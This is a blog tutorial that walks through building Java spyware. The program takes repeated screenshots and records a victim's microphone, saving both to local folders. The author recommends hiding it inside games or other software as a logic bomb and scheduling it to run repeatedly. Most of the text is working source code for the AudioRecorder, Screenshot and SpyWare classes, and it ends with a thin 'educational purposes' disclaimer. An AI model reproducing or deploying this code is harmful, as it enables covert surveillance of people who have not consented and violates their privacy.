Today we are going to build a spying tool using Java. In order to spy on a victim’s computer, we will use two things. Screenshot and voice recording from his microphone. Our basic idea is to capture the screen and voice. And we can inject this malware inside any game or custom software as a logic bomb. And this script can be added to the scheduler of that computer. So that you can spy on the victim after every specific amount of time.
Prerequisites
- Java 8+ (I will be using 14)
- Maven
Objectives
- Take multiple screenshots
- Voice record for a certain amount of time ( your choice, can be all-day If you want)
Application Structure
Inside our captures directory, there are two different directories, one for audio another for images. And we will have 3 classes in the java directory. The AudioRecorder.java, ScreenShot.java, and SpyWare.java.
.
├── pom.xml
├── src
│ ├── main
│ │ ├── captures
│ │ │ ├── audio
│ │ │ └── image
│ │ ├── java
│ │ │ ├── AudioRecorder.java
│ │ │ ├── Screenshot.java
│ │ │ └── SpyWare.java
│ │ └── resources
│ └── test
│ └── java
Development of the malware [ step 01 | Audio recorder ]
In our AudioRecorder.java, let’s add these property first.
import javax.sound.sampled.*;
import java.io.*;
import java.util.Calendar;
public class AudioRecorder {
private final AudioFileFormat.Type fileType = AudioFileFormat.Type.WAVE;
private TargetDataLine line;
}
We defined fileType as .wav for our case. Now, Let’s talk about TargetDataLine interface. Which implemented DataLine and DataLine implemented Line interface.
The Line interface represents a mono or multi-channel audio feed. A line is an element of the digital audio “pipeline,” such as a mixer, an input or output port, or a data path into or out of a mixer.
DataLine adds media-related functionality to its superinterface, Line. This functionality includes transport-control methods that start, stop, drain, and flush the audio data that passes through the line. A data line can also report the current position, volume, and audio format of the media.
A target data line is a type of DataLine from which audio data can be read. The most common example is a data line that gets its data from an audio capture device. (The device is implemented as a mixer that writes to the target data line.)
Now let’s add a method for formatting our audio inside AudioRecorder.java.
private AudioFormat getAudioFormat() {
float sampleRate = 16000;
int sampleSizeInBits = 8;
int channels = 2;
return new AudioFormat(sampleRate, sampleSizeInBits, channels,
true, true);
}
AudioFormat is the class that specifies a particular arrangement of data in a sound stream.
Now let’s add a method to start voice recording.
public void startRecording() {
try {
AudioFormat format = getAudioFormat();
DataLine.Info info = new DataLine.Info(TargetDataLine.class, format);
if (!AudioSystem.isLineSupported(info)) {
System.out.println("Line not supported");
System.exit(0);
}
saveRecording(format, info);
} catch (IOException | LineUnavailableException exception) {
exception.printStackTrace();
}
}
We have used another method inside startRecording() method, which is saveRecording() to save the voice record in a file. Which will be saved in captures/audio directory. Let’s define our saveRecording() method.
private void saveRecording(AudioFormat format, DataLine.Info info)
throws IOException, LineUnavailableException {
Calendar now = Calendar.getInstance();
File wavFile = new File(
"src/main/captures/audio/"+now.getTime() + ".wav");
line = (TargetDataLine) AudioSystem.getLine(info);
AudioInputStream audioInputStream = new AudioInputStream(line);
line.open(format);
line.start();
AudioSystem.write(audioInputStream, fileType, wavFile);
}
We need a method to stop and close the line. Let’s name it finish()
public void finish() {
line.stop();
line.close();
}
Now let’s add a method to stop recording, using the finish() method.
public void stopRecordingAudio(long sleepTime) {
try {
Thread.sleep(sleepTime);
} catch (InterruptedException ex) {
ex.printStackTrace();
}
finish();
}
We will call this method in a thread. The parameter sleepTime is your choice and freedom. Do whatever you like with that. After all, it will run on the victim’s computer.
Development of the malware [ step 02 | Screenshot ]
Inside our Screenshot.java class let’s add a static method called captureScreen().
import javax.imageio.ImageIO;
import java.awt.*;
import java.awt.image.BufferedImage;
import java.io.File;
import java.io.IOException;
import java.util.Calendar;
import java.util.concurrent.TimeUnit;
public class Screenshot {
public static void captureScreen() throws AWTException, IOException {
Calendar now = Calendar.getInstance();
Robot robot = new Robot();
BufferedImage screenShot = robot.createScreenCapture(
new Rectangle(Toolkit.getDefaultToolkit().getScreenSize()));
ImageIO.write(screenShot, "JPG", new File(
"src/main/captures/image/"+now.getTime()+".jpg"));
}
}
Robot class is used to generate native system input events for the purposes of test automation, self-running demos, and other applications where control of the mouse and keyboard is needed. The primary purpose of Robots is to facilitate automated testing of Java platform implementations.
We will save the image in our captures/image directory.
Now let’s add another method to capture multiple screenshot.
public static void multipleScreenShots() {
try {
for (int i = 0; i <= 10; i++) {
Screenshot.captureScreen();
TimeUnit.SECONDS.sleep(9);
}
} catch (AWTException | IOException | InterruptedException e) {
e.printStackTrace();
}
}
Development of the malware [ Assemble The Avengers! ]
This is how we assemble of both recording and screen capture avengers are looking like in SpyWare.java.
import java.net.NetworkInterface;
import java.net.SocketException;
import java.util.Enumeration;
public class SpyWare {
private static final long RECORD_TIME = 60000;
public static void main(String[] args) {
screenshotThread();
recorderThread();
}
public static void recorderThread() {
AudioRecorder audioRecorder = new AudioRecorder();
Runnable runnable = () -> audioRecorder.stopRecordingAudio(RECORD_TIME);
Thread stopper = new Thread(runnable);
stopper.start();
audioRecorder.startRecording();
}
public static void screenshotThread() {
Runnable runnable = Screenshot::multipleScreenShots;
Thread screenShotThread = new Thread(runnable);
screenShotThread.start();
}
}
We have used threading and lambda expressions to improve our code. The recorderThread() method will sleep for some time and then will finish the recording. And screenshotThread() will capture multiple screenshots in another thread. Finally, we will invoke those methods in our main method.
I will do another part of this article to get those screenshots and audio.
This main method is all you need. Where, when, and how you will use, depends on you. Do not blame me for your crime. I wrote this for educational purposes. And I meant the victim’s computer as your second computer.
Study hard. Keep yourself safe from foul creatures.
Amen!
No Comments
Leave a comment Cancel